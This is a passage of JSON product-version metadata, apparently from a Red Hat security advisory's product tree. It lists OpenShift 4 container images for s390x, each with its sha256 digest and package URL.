"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844499"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846804"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848745"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3A671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844782"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3Aac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848908"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3Aaad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844470"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3Ac250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849297"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3Ad618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848367"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-cloud-controller-manager-rhel9@sha256%3Ab571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847381"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3Aee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846048"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256%3A7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3A7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849835"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-machine-controllers-rhel9@sha256%3A45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845460"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Aa3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3A3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847882"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3A6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3Ad25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851387"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851359"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3Af247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3Ab98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849586"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848525"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3Ae0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3A1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848305"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773860329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3Aa3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3Ac3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846709"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851203"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844493"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3A3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3Ab576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773737444"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"product": {
